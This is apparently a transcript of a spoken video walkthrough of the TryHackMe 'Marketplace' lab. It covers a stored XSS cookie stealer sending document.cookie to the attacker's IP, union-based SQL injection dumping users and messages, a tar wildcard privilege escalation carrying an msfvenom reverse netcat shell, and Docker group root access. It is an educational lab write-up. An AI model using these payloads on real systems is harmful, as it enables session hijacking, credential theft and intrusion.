Hey guys, what's up? Today I'm going to be doing Marketplace uh, from TryHackMe. This is actually a great web application hacking tutorial. It's not a beginner class, and definitely it was a learning curve for me. But hopefully after this video, you guys get a good insight on how to do some cross-site scripting, as well as some SQL injection. And then what we're going to be doing is going to be using GTFO bins to do a pivot to another user, and then that user we're going to exploit Docker to get a shell as root. So let's begin. So I already started the machine. I'm going to CD to my desktop, and I'm going to run this script that I wrote. It just enumerates my process of recon, so it automatically runs Rust scan. It will ping first the machine, make sure it's alive. Then I'm going to run Rust scan. The first thing I see is that port 80 is open, and obviously port 22. Port 22 is not very exploitable. So obviously the next attack vector that I'm going to do is port 80. So let's go and check it out, and we get a web page. So the first thing that I thought was maybe we can log in as an admin user. So let's try admin, admin, and then admin, and no user found. Okay, so then let's see if I can do admin and maybe some SQL injection and nothing. And let's try it one more time with admin that, and we don't get an error. So I don't think the login page is accessible through SQL injection. And while this is actually running, what I'm going to do is I'll just sign up. So I'm going to create test 1 2 3. Cool, I signed in successfully. So now I'm going to go with test 1 2 3, and I'm in. And now I can create new listings, home, and I'm going to check, see what I can do. So looking at the different listings, I can contact the listing author and report it to admin. So let's see, if I report this, it says, thank you. One of our admins will evaluate whether the listing you reported breaks our guidelines, and we'll get back to you via a private message. Thank you for using Marketplace. Okay, cool. The script ended, so Ruscan ended, and I can see that this is there's another port, HTTP. It's running Node.js. When I went and checked what this port was, it's disallowed, so there's really nothing in port 32768. I know that this is running Nginx, so I'm just going to run fff to see what directories I can run. Yes, no, I don't want to filter any status code. Let's just run dirbuster. I'll put text dot and then php, and then this will run. Also, I was using a new tool that I was using is Luke Stevens Luke's hack crawler, which is a spidering tool. Obviously, this is kind of there's a GoBuster hack crawler I really like. They're both written in Go, but if you have a pro version of Burp, you can spider using Burp. But I don't, so I just use this, and I'm just going to do HTTP, and then the IP, which is this. And then I'm going to do dash dev 2. And with the dash dev 2 means it's going to go item and then 1. So you're going to see 2. And the cool part about hack crawler is that it shows you the URLs and robots. And obviously, if there was JavaScript, it'll show you JavaScript as well, any JavaScript files. But I see that there's contact Jake, there are reports, login, sign up, and there's an admin page. So what I'm going to do is I'm going to open that and see if I can get access to the admin page, and I can't. Okay. And looking at my FFF, there's really nothing. So I'm just going to create a listing and see what I can do. And let's see what this does. Cool, it creates a listing, and then I can also report it to an admin. Okay, so now the hacker mentality is thinking, okay, there's a new listing here, and there's a text box. If you're new to cross-site scripting, anywhere that you can add any text in here should be a sign that, okay, let's try and add some JavaScript to execute. Okay, so let's do the most simplest thing is script alert. Hello, I am testing XSS. Close the script. And then we're going to put this is another test. And then we're going to submit the query. And boom. Okay, so it is vulnerable to XSS. Perfect. So now we know that this is vulnerable to XSS, and I can report this to admin. So I can steal the admin's cookies if they click this link. So one thing that I found on the internet was this article here that has a great payload that you can use for XSS to hijack a user session. Obviously, on GitHub, if you Google XSS cookie stealers, there's going to be Python scripts that you can just clone onto your computer. I just user preference. This is a lot easier for me and a lot faster. So I'm just going to copy this. What the new image.source does, like it says here, a new image object in the DOM of the current page and sets the source attribute to the attacker's website, which will be our IP address, right? So let's go to new listing. We'll create a new one. In the meantime, I'm just going to stop this. I don't, but awesome. And now I'm going to do script new image dot source my IP 10.11.0.74, and I'm going to put 4444 as the IP address. You'll see why in a little bit. Random.php question mark C output is equal to that. I think I forgot to put, yep. Source is equal to here, HTTP. There we go. And then plus document.cookie. And if you have never ever done JavaScript, trust me, I'm not an expert with JavaScript, but document.cookie is the JavaScript format for session cookies. So this is going to be adding the output will equal whatever the session cookie is, and it's going to be sent to you. So we're going to close that, and we're going to close the script tag again. And I'm going to put this is a bad listing. Please help. So, and then I'm going to submit my query. And then before I report it to the admins, what I'm going to do is I'm going to clear this at netcat tag NLVP 444. I'm going to set my netcat listener. Let's report this to the admin, and let's see if the admin falls for it, clicks on it, and gives me their cookies. And as you can see, yes, they did. And all this is the admin's cookies. So now what I'm going to do is going to use my handy dandy cookie editor, which it's a Firefox add-on. Going to copy and paste that, save it, and refresh my page, and boom, now I'm the admin, and I have an administrator panel. And congratulations, you have your first flag. So just a quick roundup of the first step was anytime you can insert text on a web page, test for JavaScript, because again, JavaScript is what the browser processes. And if it doesn't filter the script tags or any tags properly, you are able to do either stored cross-site scripting or a self or like a script uh, cross-site scripting that allows you to execute it whenever you click like the page or whatever. So that now let's try to get access to the machine. So I clicked user one, right? And I noticed that there's this one here. And I thought maybe let's see if this is I can do some SQL injection. So to test for SQL injections, you can do double quotes or single quotes. It doesn't matter. But I just use single quotes and you get this error. This error right here is a huge no-no when you're a web developer because you are letting the hacker know that you are susceptible to SQL injection and you are running a MySQL server. Okay, so now I know. So I'm going to remove the quote because this is an integer, not a string. You don't need to add that quote in. So what I'm going to do is I'm going to do order by to figure out how many columns exists in the database. So the way you can do this is you can do by one, and I misspelled order, so order, and nothing happens. Okay, let's go two, and you want to continue until you get an error. Okay, let's go four, and let's go five. Okay, there you go. So now I got an error, so which I know that the max number of columns is four. So now what I can do is I can do a union select. What union select does is it just allows you to include a second select statement within the original select statement that's in the server's code. So I'm going to do 1, 2, 3, 4. Okay. Now what I can do is I can actually check and see what the version is. So because this is a MySQL server, I can do at version, and if you notice, nothing happened. The reason why nothing happens is because this one here is still true. So I can just change it to a really big number, and you can see here that it says user, and then this right here is the version. So because the user is equal to a false number, this union statement will work. Now I can check for database. Let's see what's the name of the database. I can replace the at version with database, and the database is marketplace. Okay, cool. So I know it's a marketplace, and I know it's MySQL, and I know the version. Now let's try and enumerate this machine even further, and let's try get some columns and tables, and rows that exist here. So we'll do group concat, which means I'm going to concatenate the strings together. Table underscore name, and then from information underscore schema dot tables. Where table dot schema is equal to database. And I get this error, right? So I probably misspelled something. Let's see. I think I have to add a select statement within here. Oh, what am I missing? Ah, here it is. I messed up the schema part. Sorry about that, guys. So then we'll do that. And I still get an error, and because I need this select statement within here. There you go. So when you want to add that group concatenate, you have to add this select. So then you know that union select, and then this you want to do all of this within the main select statement. So I know that there are three tables: items, messages, and users. Okay. So now we can get the list of columns, and I will type in this command right here. I'm just going to change this to table name, comma, dash dash, comma, column underscore name. Sorry, wrong one. From information.schema.columns instead. And then where table underscore schema equals database, the same thing. And here you go. This is telling us this right here, again, is the table, and this is the column, because if you can see here, I'm concatenating table name with the column name. So table name, column name, table name, column name. And this is good information. So we have here users, and there's a column is administrator, which you can say here is administrator equals true or not. Okay, so that's really good information to know. So the next thing I'm going to do is I'm actually going to get a list of the usernames and passwords that exist. So I'm just going to delete all of this. And I'm going to do union select group concatenate space ID space user name password, and then from users. And here we go. So I get Michael and this password here. So I tried getting this hash and cracking it, but obviously it was too hard to crack. So there has to be another method of getting a password, and I was checking through some articles, and I found that there was also the messages table that we found has some useful information, so we're going to check that. And what I'm going to do is I'm going to, again, keep the concatenate part, but this time I'm going to use user underscore 2 and message underscore content from messages, again, the table from messages. And that's just typical SQL syntax that you want to, the from messages, that's just the table name, and this is what you want to get, user underscore 2, and then message contents. And we're doing user 3, okay. Hello, an automated system has detected your SSH password's too weak, and bingo, here's the password. So we're going to copy this, and if we remember, there were two users, Michael and Jake, from the previous SQL syntax. So I'm gonna use SSH Michael at 10.10 118.122 yes, and we'll copy and paste, and that's not his password. So my guess is that password's probably Jake's. And it is Jake. Okay, cool. So now what I'm going to do is, let's go cat user.txt, and there's the second flag. So now I'm going to check what can Jake sudo as, and this is a quick tip, is just always use sudo tackl. That's just a quick method to see what a user that you hacked in as can sudo. And he can sudo as Michael, no passwords needed, and there's a shell, a bash file. So let's actually look at what this file does. And I can't do that. Okay, so let's do cat -opt let's just do cd -opt -backups. Okay, so let's do cat backup.sh, and we can see that it's running tar cf backups and then a wildcard statement. So there was a box I did once that I could actually, I saw this command. Here go tar exploit wildcat, and hacking articles actually has a great instructional tutorial on how to exploit this. But basically what we're going to be doing is we're going to be setting up MSF Venom to create a reverse netcat shell, and then we're going to create this shell.sh. And the reason why is because what this script, this line is doing, it's taking a backup.tar, like a backup.tar file of everything within the backups directory that we're currently in. That's all it's doing. So by creating a shell script, making it executable, and adding this reverse shell, that backup script, that tar being exploitable through that, it's going to execute that shell script, automatically sending us a netcat shell onto our attacker machine as Michael. So I'll walk you through it. It's not difficult, but it is a little confusing. So first we're going to do MSF Venom -p for payload -cmd. It's going to be cmd Unix -reverse netcat lhost is equal to 10.10.11.0.74. lport is equal to 4444. R for raw, and this is going to take a little bit of time to make the payload. And here we go. So we're just going to copy this part right here, and then we're going to use echo double quotes, copy that, and just put it into shell.php. Nice. And then I'm going to change the permissions to executable on the shell.php. And let's see, what else can we do here? Then it says echo, and we're going to actually copy this line, checkpoint actions execute. So let's just actually copy and paste it. Can I copy and paste all this? Yes, I can. Close that. And just a quick talk what this command does. So we're actually just echoing this to the directory, but the -- checkpoint -action is saying, okay, what action do I want tar to do? it's equals to execute, and then the execute's gonna say that I want to execute a shell, and this is the program that you're gonna execute as with bash, right? And this is just something that this is part of the tar commands. If you read the manual tar, it'll explain it better than I can. But this is basically what it's doing. This command is just it's allowing tar to execute a shell script. So we'll finish that. And then the last one is checkpoint 1. We'll copy that. And now the last thing is we're going to move the backup.tar to backup2.tar. Cool. And now let's clear that. Let's set up our netcat listener again. And now we'll do sudo tac u for user Michael dash op dash backups dash backup.sh. Can't open shell. Did I not make it executable? Let's try this again. Oh, that's why I messed up. And it's shell.php to shell.sh. Sorry about that, guys. And let's try running this again. And there we go. So now I have ID. Cool. Now I'm Michael. So this is not a full shell, but I can make it an actual shell by using this command here. You can always use this command. And now I have a shell. So let's see. Who am I? Michael. Cool. ID. So now this is where the privesc part happens. Docker. So I'm a member of the Docker group, and I ran limpies, and this is the only thing that showed up as critical. So after checking out GTFO bins, I actually found that there was an exploit here for Docker. Where is it? Right here. And I can get shell, and I can just run this command right here. So let's do it. And now let's see, ls ID, and there you go. Now I'm root. So now we can do cd root cat root.txt, and there you go. Now I got the root flag, and that's pretty much it. Thank you for watching this video. I hope you learned something. I definitely did when I was doing this box. I had no idea how to exploit Docker. Had no idea that GTFO bins had Docker to exploit, as well as SQL is definitely something that I need to study up on and get better at, because this was completely new commands that I've done. I didn't realize that what the concatenate and how to further enumerate this, but definitely a great learning experience. So thank you for watching, and I'll catch you on the next one.